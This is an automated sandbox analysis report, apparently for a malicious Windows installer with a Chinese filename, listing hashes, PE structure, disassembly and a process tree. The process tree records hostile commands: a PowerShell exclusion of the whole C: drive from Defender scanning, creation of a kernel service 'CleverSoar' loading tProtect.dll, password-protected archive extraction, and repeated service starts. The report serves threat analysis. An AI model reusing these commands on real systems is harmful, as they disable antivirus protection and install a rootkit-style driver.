                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.949167675813021
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 98.04%
                            • Inno Setup installer (109748/4) 1.08%
                            • InstallShield setup (43055/19) 0.42%
                            • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                            File name:#U5b89#U88c5#U52a9#U624b1.0.3.exe
                            File size:7'495'744 bytes
                            MD5:3dd1a269e502f7284674c54819e9ad8e
                            SHA1:f3764c08583b70e6427d8efe97e6daa1582de9a3
                            SHA256:9622e99ad30c7b5bef5ad85c34ea80a961f1d5d05dcc9a0083c3fa8a00966228
                            SHA512:392d4b57eadc20d7118954c3c9e44e80803cd0df05b9beecdab7219ba8a1826e0427748dec12b07c4179c444f526941399b606b79209393a08c16c1439256e05
                            SSDEEP:196608:l9Z1v6nEaCmoy2/qQAflhtvgG+Kay7DS2KI:lonELvy2/qRlhSG+Kx7DS2L
                            TLSH:C2762223F2CBD03EE05A1B3715B2A61494FB6A616523AD5296FCB4ECCF310601E3E657
                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                            Icon Hash:0c0c2d33ceec80aa
                            Entrypoint:0x4a83bc
                            Entrypoint Section:.itext
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:1
                            File Version Major:6
                            File Version Minor:1
                            Subsystem Version Major:6
                            Subsystem Version Minor:1
                            Import Hash:40ab50289f7ef5fae60801f88d4541fc
                            Instruction
                            push ebp
                            mov ebp, esp
                            add esp, FFFFFFA4h
                            push ebx
                            push esi
                            push edi
                            xor eax, eax
                            mov dword ptr [ebp-3Ch], eax
                            mov dword ptr [ebp-40h], eax
                            mov dword ptr [ebp-5Ch], eax
                            mov dword ptr [ebp-30h], eax
                            mov dword ptr [ebp-38h], eax
                            mov dword ptr [ebp-34h], eax
                            mov dword ptr [ebp-2Ch], eax
                            mov dword ptr [ebp-28h], eax
                            mov dword ptr [ebp-14h], eax
                            mov eax, 004A2EBCh
                            call 00007F0730464105h
                            xor eax, eax
                            push ebp
                            push 004A8AC1h
                            push dword ptr fs:[eax]
                            mov dword ptr fs:[eax], esp
                            xor edx, edx
                            push ebp
                            push 004A8A7Bh
                            push dword ptr fs:[edx]
                            mov dword ptr fs:[edx], esp
                            mov eax, dword ptr [004B0634h]
                            call 00007F07304F5A8Bh
                            call 00007F07304F55DEh
                            lea edx, dword ptr [ebp-14h]
                            xor eax, eax
                            call 00007F07304F02B8h
                            mov edx, dword ptr [ebp-14h]
                            mov eax, 004B41F4h
                            call 00007F073045E1B3h
                            push 00000002h
                            push 00000000h
                            push 00000001h
                            mov ecx, dword ptr [004B41F4h]
                            mov dl, 01h
                            mov eax, dword ptr [0049CD14h]
                            call 00007F07304F15E3h
                            mov dword ptr [004B41F8h], eax
                            xor edx, edx
                            push ebp
                            push 004A8A27h
                            push dword ptr fs:[edx]
                            mov dword ptr fs:[edx], esp
                            call 00007F07304F5B13h
                            mov dword ptr [004B4200h], eax
                            mov eax, dword ptr [004B4200h]
                            cmp dword ptr [eax+0Ch], 01h
                            jne 00007F07304FC7FAh
                            mov eax, dword ptr [004B4200h]
                            mov edx, 00000028h
                            call 00007F07304F1ED8h
                            mov edx, dword ptr [004B4200h]
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
                            IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000x11000.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            .rsrc0xcb0000x110000x11000b2dcf14000a1dc7150e021c573503d26False0.1877154181985294data3.723301568529278IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_ICON0xcb6780xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
                            RT_ICON0xcc0e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
                            RT_ICON0xcc7480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
                            RT_ICON0xcca300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
                            RT_ICON0xccb580x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
                            RT_ICON0xce1800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
                            RT_ICON0xcf0280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
                            RT_ICON0xcf8d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
                            RT_ICON0xcfe380x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
                            RT_ICON0xd11200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
                            RT_ICON0xd53480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
                            RT_ICON0xd78f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
                            RT_ICON0xd89980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
                            RT_STRING0xd8e000x3f8data0.3198818897637795
                            RT_STRING0xd91f80x2dcdata0.36475409836065575
                            RT_STRING0xd94d40x430data0.40578358208955223
                            RT_STRING0xd99040x44cdata0.38636363636363635
                            RT_STRING0xd9d500x2d4data0.39226519337016574
                            RT_STRING0xda0240xb8data0.6467391304347826
                            RT_STRING0xda0dc0x9cdata0.6410256410256411
                            RT_STRING0xda1780x374data0.4230769230769231
                            RT_STRING0xda4ec0x398data0.3358695652173913
                            RT_STRING0xda8840x368data0.3795871559633027
                            RT_STRING0xdabec0x2a4data0.4275147928994083
                            RT_RCDATA0xdae900x10data1.5
                            RT_RCDATA0xdaea00x310data0.6173469387755102
                            RT_RCDATA0xdb1b00x2cdata1.2045454545454546
                            RT_GROUP_ICON0xdb1dc0xbcdataEnglishUnited States0.6170212765957447
                            RT_VERSION0xdb2980x584dataEnglishUnited States0.2769121813031161
                            RT_MANIFEST0xdb81c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163
                            DLLImport
                            kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                            comctl32.dllInitCommonControls
                            user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                            oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                            advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                            NameOrdinalAddress
                            __dbk_fcall_wrapper20x40fc10
                            dbkFCallWrapperAddr10x4b063c
                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States
                            No network behavior found

                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:0
                            Start time:22:52:55
                            Start date:23/12/2024
                            Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe"
                            Imagebase:0x420000
                            File size:7'495'744 bytes
                            MD5 hash:3DD1A269E502F7284674C54819E9AD8E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            Target ID:2
                            Start time:22:52:55
                            Start date:23/12/2024
                            Path:C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$2040C,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe"
                            Imagebase:0x250000
                            File size:3'366'912 bytes
                            MD5 hash:CC931C68EF6CB43932F2B21773072C73
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            Target ID:3
                            Start time:22:52:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                            Imagebase:0x7ff6e3d50000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:4
                            Start time:22:52:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:5
                            Start time:22:52:56
                            Start date:23/12/2024
                            Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENT
                            Imagebase:0x420000
                            File size:7'495'744 bytes
                            MD5 hash:3DD1A269E502F7284674C54819E9AD8E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:false

                            Target ID:6
                            Start time:22:52:57
                            Start date:23/12/2024
                            Path:C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$1042A,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENT
                            Imagebase:0x450000
                            File size:3'366'912 bytes
                            MD5 hash:CC931C68EF6CB43932F2B21773072C73
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            Target ID:7
                            Start time:22:53:00
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:8
                            Start time:22:53:00
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:9
                            Start time:22:53:00
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:10
                            Start time:22:53:00
                            Start date:23/12/2024
                            Path:C:\Program Files (x86)\Windows NT\7zr.exe
                            Wow64 process (32bit):true
                            Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                            Imagebase:0x7c0000
                            File size:831'200 bytes
                            MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            • Detection: 0%, Virustotal, Browse
                            Reputation:moderate
                            Has exited:true

                            Target ID:11
                            Start time:22:53:00
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:12
                            Start time:22:53:01
                            Start date:23/12/2024
                            Path:C:\Program Files (x86)\Windows NT\7zr.exe
                            Wow64 process (32bit):true
                            Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                            Imagebase:0x7c0000
                            File size:831'200 bytes
                            MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:13
                            Start time:22:53:01
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:14
                            Start time:22:53:01
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:15
                            Start time:22:53:01
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:16
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:17
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:18
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:19
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:20
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Imagebase:0x7ff717f30000
                            File size:496'640 bytes
                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:21
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:22
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:23
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:24
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:25
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:26
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:27
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:28
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:29
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:30
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:31
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:32
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:33
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:34
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:35
                            Start time:22:53:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:36
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
